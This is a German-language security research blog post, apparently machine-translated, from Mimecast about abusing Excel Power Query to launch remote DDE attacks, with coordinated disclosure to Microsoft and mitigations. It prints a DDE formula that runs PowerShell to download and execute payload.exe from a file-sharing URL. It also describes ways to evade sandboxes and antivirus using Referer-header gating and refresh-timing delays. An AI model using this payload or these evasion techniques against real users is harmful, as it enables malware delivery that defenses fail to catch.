Das Mimecast Threat Center entdeckte eine Schwachstelle im Microsoft Excel-Tool, das die Einbettung bösartiger Nutzlasten aus der Ferne ermöglicht.

Summary

(Anmerkung der Herausgeberin: Das Team des Mimecast Threat Center möchte die Beiträge des Teammitglieds Doron Attias in der folgenden Untersuchung würdigen).

Das Mimecast Threat Center hat eine Technik gefunden und entwickelt, die eine Funktion in Microsoft Excel namens "Power Query" verwendet, um einen entfernten Dynamic Data Exchange (DDE)-Angriff in einer Excel-Tabelle dynamisch zu starten und die Nutzlast "Power Query" aktiv zu steuern.

Leistungsabfrage ist ein leistungsstarkes und skalierbares Business Intelligence (BI)-Tool, mit dem Anwender ihre Tabellenkalkulationen in andere Datenquellen integrieren können, wie z.B. in eine externe Datenbank, ein Textdokument, eine andere Tabellenkalkulation oder eine Webseite, um nur einige zu nennen. Wenn Quellen verknüpft sind, können die Daten in die Tabellenkalkulation geladen und gespeichert oder dynamisch geladen werden (z.B. beim Öffnen des Dokuments).

Das Team des Mimecast Threat Center fand heraus, dass Power Query auch für ausgeklügelte, schwer zu entdeckende Angriffe eingesetzt werden könnte, bei denen mehrere Angriffsflächen kombiniert werden. Mithilfe von Power Query könnten Angreifer bösartige Inhalte in eine separate Datenquelle einbetten und die Inhalte dann beim Öffnen in die Kalkulationstabelle laden. Der bösartige Code könnte dazu verwendet werden, Malware fallen zu lassen und auszuführen, die den Rechner des Benutzers kompromittieren kann.

Die Funktion verfügt über eine so reichhaltige Steuerung, dass mit ihr Fingerabdrücke von einem Sandkasten oder der Maschine eines Opfers genommen werden können, noch bevor irgendwelche Nutzlasten ausgeliefert werden. Der Angreifer verfügt über potentielle Pre-Payload- und Pre-Exploitation-Kontrollen und könnte eine bösartige Nutzlast an das Opfer ausliefern und gleichzeitig die Datei für eine Sandbox oder andere Sicherheitslösungen harmlos erscheinen lassen.

Mimecast arbeitete mit Microsoft im Rahmen der Koordinierte Offenlegung von Schwachstellen (CVD)-Prozess, um zu bestimmen, ob dies ein beabsichtigtes Verhalten für Power Query ist oder ob es sich um ein zu lösendes Problem handelt. Microsoft lehnte zu diesem Zeitpunkt die Veröffentlichung eines Fixes ab und bot stattdessen einen Workaround an, um das Problem zu mildern.

Holen Sie sich die neuesten Forschungsergebnisse zu Bedrohungen aus dem Mimecast Threat Center in Ihren Posteingang. Abonnieren Sie die Cyber Resilience Insights noch heute.

Wir stellen einen detaillierten Walkthrough eines potenziellen Exploits zur Verfügung, bei dem Power Query zum Starten eines DDE-Exploits verwendet wird, das eine Nutzlast von einer File-Sharing-Site fallen lassen und ausführen könnte.

Bedrohungen mit der Machtabfrage als Angriffsfläche

Da Power Query ein leistungsstarkes Tool innerhalb von Microsoft Excel ist, ist die potenzielle Gefahr eines Missbrauchs der Funktion groß. Wenn es ausgenutzt wird, kann es verwendet werden, um ausgeklügelte Angriffe zu starten, die mehrere potenzielle Angriffsflächen kombinieren, von der lokalen Privilegieneskalation über DDE-Angriffe bis hin zu Ausnutzungen der entfernten Codeausführung.

Die Leistungsabfrage-Funktion ist so konzipiert, dass Sie entfernte Inhalte einfach und dynamisch einbetten können. Solche Angriffe sind in der Regel schwer zu erkennen und geben Bedrohungsakteuren mehr Chancen, den Host des Opfers zu kompromittieren. Unter Ausnutzung der potenziellen Schwäche von Power Query könnten Angreifer potenziell jede bösartige Nutzlast einbetten, die wie vorgesehen nicht im Dokument selbst gespeichert, sondern beim Öffnen des Dokuments aus dem Internet heruntergeladen wird.

Um zu demonstrieren, wie Power Query zum Starten eines DDE-Exploits verwendet werden kann, wurde eine externe Webseite, die die Nutzlast hostet, in die Kalkulationstabelle geladen, und sie konnte einen benutzerdefinierten, einfachen HTTP-Server schreiben, um die Nutzlast auf einer zu bedienenden Webseite zu hosten. Der HTTP-Server hörte lokal auf Port 80 ab und diente DDE-Inhalte als Antwort, wenn eine Anfrage von der Tabellenkalkulation empfangen wurde.

=cmd|'/c powershell -befehl "& {{ iwr https://www.dropbox.com/s/jo94jn2s3j84mfr/payload.exe?dl=1 -OutFile payload.exe } " ;cmd /c payload.exe'!A1,

Leistungsabfrage-Bild 1.png

Die Microsoft Excel 2016-Tabelle verwendete Power Query, um die erstellte bösartige Webseite anzufordern (http://127.0.0.1:80).

Leistungsabfrage-Bild 2.png

Der entfernte Inhalt wird abgerufen und in die Tabellenkalkulation geladen.

Leistungsabfrage-Bild 2A.jpg

Die Wireshark-Erfassungsdaten wurden verwendet, um den Angriffsablauf zu verfolgen. Das erste markierte Paket enthielt die DDE-Formel: die DNS-Anforderung für "dropbox.com", wo die payload.exe und die HTTPS-Sitzung gespeichert wurden und die Nutzlast ausgeliefert wurde.

Leistungsabfrage-Bild 3.png

Leistungsabfrage-Bild 4.png

Analysieren des Dateiformats

Bei der Untersuchung des Dateiformats sahen wir, dass "table/table1.xml" mit den Eigenschaften "name: "localhost"" erstellt wurde. (Standard) und "Typ": "AbfrageTabelle"".

Die Verknüpfung zwischen der Tabelle und den spezifischen Eigenschaften der Abfragetabelle wurde im . "rels"-Stream ("_rels/table1.xml.rels") beschrieben, der ein Feld namens "target" enthielt und auf "../queryTables/queryTable1.xml" zeigte. Die quetyTable1.xml enthielt Daten, die "connection.xml" (die alle Eigenschaften der Dokumentenverbindung sammelt) über das Feld "connectionId" verknüpften. unter "<queryTable>." Die Verbindung wurde mit dem dbPr-Objekt über den Befehl "Select *" hergestellt.

Die Webabfrage selbst wurde im Dokument "xl\customXL\item1" gespeichert und in base64 kodiert.

Leistungsabfrage-Bild 5A.png

Nach der Dekodierung von base64 öffneten wir das darin befindliche Dokument "section1", das die Abfrage selbst enthielt.

Leistungsabfrage-Bild 5B.png

Um das DDE laufen zu lassen, muss der Benutzer auf die Zelle doppelklicken, die das DDE lädt, und dann erneut klicken, um es freizugeben. Diese Vorgänge lösen das DDE aus und starten die Nutzlast, die aus dem Web empfangen wurde.

Umgehen der Notwendigkeit eines Doppelklicks - Ermöglichen einer automatisierten Ausführung

Um das Problem des "Klicks zum Ausführen" zu umgehen, die Entdeckung, dass es in alten Versionen von Microsoft Office einige Unterschiede in der "Get External Data>> From Web"-Implementierung gibt. Wie bereits erwähnt, wird "dbPr" bei der Verwendung von Microsoft Office 2016 erstellt, und der Benutzer muss handeln, um die Nutzlast zu aktivieren (in einigen Fällen, wie bei Sandboxen, können diese Klicks eine Umgehung der Sandbox verursachen).

Wenn "Get External Data>> From Web" in älteren Office-Versionen (z.B. 2010) verwendet wird, ist das unter "Connections.xml" erstellte Objekt nicht "dbPr" wie bereits erwähnt, sondern "webPr", was viel einfacher ist. Im Gegensatz zu "dbPr" sind bei "webPr" keine Benutzeraktionen erforderlich, um die Nutzlast auszuführen.

Leistungsabfrage-Bild 5C.png

Umgehen von AVs und Sandboxen mithilfe des Tools zur Abfrage der ausgenutzten Leistung

Hinzufügen von Headern zur Web-Anfrage (Query), so dass die Nutzlast Antiviren- und Sandboxing-Funktionen umgehen kann, die darauf ausgelegt sind, genau diese Art von bösartigem Inhalt zu blockieren. Der Webserver stellte bösartige Inhalte nur dann zur Verfügung, wenn ein bestimmter HTTP-Header in der Anfrage vorhanden war. Der Anti-Virus extrahierte die URL des HTTP-Servers aus der Datei, analysierte jedoch nicht die Header. Wenn der AV eine Testanforderung sendete, wusste der Server, dass diese vom AV und nicht von der Tabellenkalkulation stammte.

Das DDE wird nur bedient, wenn der HTTP-Header "Referer" auf "www.google.com" gesetzt ist. Andernfalls wird der Inhalt nicht zugestellt.

Leistungsabfrage-Bild 5D.png

Durch Festlegen des spezifischen Web-Headers mit Hilfe von Power Query im Modus "Erweitert". Power Query führte die Webanfrage mit dem angeforderten "Referer"-Header aus.

Leistungsabfrage-Bild 12.png

Wenn eine andere Anwendung versucht, das Verhalten der Leistungsabfrage teilweise zu simulieren und die Webseite nicht mit dem richtigen "Referer"-Header anfordert, wird die Nutzlast nur beim Öffnen des Originaldokuments mit der Microsoft Excel-Anwendung bereitgestellt.

Leistungsabfrage Bild 13.png

Da die Sandbox auch den benutzerdefinierten Header als Teil der Anfrage senden würde, war ein neuer Weg erforderlich, um eine Entdeckung zu vermeiden. Stattdessen wurden die Intervalle "Auto Refresh" und "Refresh" in Power Query verwendet.

Leistungsabfrage-Bild 14.png

Vermeiden von bösartigem Inhalt, der diese Datei potenziell als Malware kennzeichnen könnte, indem die Datei gezwungen wird, Daten beim Öffnen der Datei zu aktualisieren und Daten vor dem Speichern aus dem externen Datenbereich zu entfernen. Diese Eigenschaften stellen sicher, dass die Nutzdaten in der Datei beim Öffnen der Datei aktualisiert werden. Die Datei wird so eingestellt, dass sie jede Minute (die Mindestzeit) aktualisiert wird und die Nutzlast bei der 10. Das bedeutet, dass jede Sandbox, die die Datei in weniger als 10 Minuten ausführt, niemals unsere Nutzlast erhalten würde.

Leistungsabfrage-Bild 15.png

Im Falle des angeführten Beispiels werden die meisten statisch analysierenden AVs die Datei (die die Nutzlast nicht enthält) nicht erkennen, und Sandboxen oder andere Sicherheitslösungen, die den Inhalt nur ein- oder zweimal herunterladen, werden ihn ebenfalls übersehen.

Leistungsabfrage-Bild 16.png

Abhilfe und Abschluss

Das Team des Mimecast Threat Center hat sich mit unseren Informationen und einem funktionierenden Proof of Concept an das Microsoft Security Response Center (MRSC) gewandt. Das MRSC eröffnete einen Fall, aber Microsoft beschloss, dieses Verhalten nicht zu beheben, und ihre Antwort beinhaltete eine Umgehungslösung, indem sie entweder eine Gruppenrichtlinie verwendeten, um externe Datenverbindungen zu blockieren, oder das Office Trust Center nutzten, um dasselbe zu erreichen. Das MRSC akzeptierte unsere Bitte, diese Forschung gemäß der CVD-Richtlinie zu veröffentlichen.

Microsoft veröffentlichte eine beratend (4053440) die Schritte und Verfahren zur Bereitstellung von Informationen über Sicherheitseinstellungen für Microsoft Office-Anwendungen aufzeigt. Dieser Ratgeber gibt Hinweise darauf, was Benutzer tun können, um sicherzustellen, dass diese Anwendungen bei der Verarbeitung von Feldern für den dynamischen Datenaustausch ordnungsgemäß gesichert sind.

Die Angreifer versuchen, die Entdeckungen der Opfer zu untergraben. Es besteht zwar die Möglichkeit, dass diese Art von Angriffen im Laufe der Zeit entdeckt wird, da Bedrohungsinformationen zwischen verschiedenen Sicherheitsexperten und Plattformen für den Informationsaustausch ausgetauscht werden, aber Mimecast empfiehlt allen Microsoft Excel-Kunden dringend, die von Microsoft vorgeschlagenen Umgehungslösungen zu implementieren, da die potenzielle Bedrohung für diese Microsoft-Benutzer real ist und die Ausnutzung schädlich sein könnte. 

Mimecast Gezielter Schutz vor Bedrohungen erkennt und blockiert die Verwendung dieser Technik durch fortschrittliches Deep-Parsing und Deobfuscation nach der Echtzeit-Codeanalyse jeder analysierten Datei.

Sie wollen noch mehr Artikel wie diesen? Abonnieren Sie unseren Blog.

Erhalten Sie alle aktuellen Nachrichten, Tipps und Artikel direkt in Ihren Posteingang

Das könnte Ihnen auch gefallen:

Verdeckte dateifreie Malware: Die neuen Toolkits der Cyberhacker näher betrachtet

Das Neueste aus den Mimecast Research Labs i...

Das Neueste von Mimecast Research Labs beinhaltet eine Malware te... Mehr lesen >

Dor Zvi

von Dor Zvi

Sicherheitsforscher, Mimecast

Posted May 31, 2019

Ransomware am Valentinstag: GandCrab nimmt einsame Nutzer ins Visier

Dieser Valentinstag, dein großer Tag...

This Valentine’s Day, your big heart could get you in … Read More >

Joshua Douglas

by Joshua Douglas

VP, Bedrohungsanalyse

Veröffentlicht am 14. Februar 2019

Die Rückkehr des Equation Editor Exploits – DIFAT Overflow

The latest from Mimecast Research Labs. …

The latest from Mimecast Research Labs. Summary In the last… Read More >

Meni Farjon

by Meni Farjon

Chief Scientist for Advanced Threat Detection

Veröffentlicht am 1. März 2019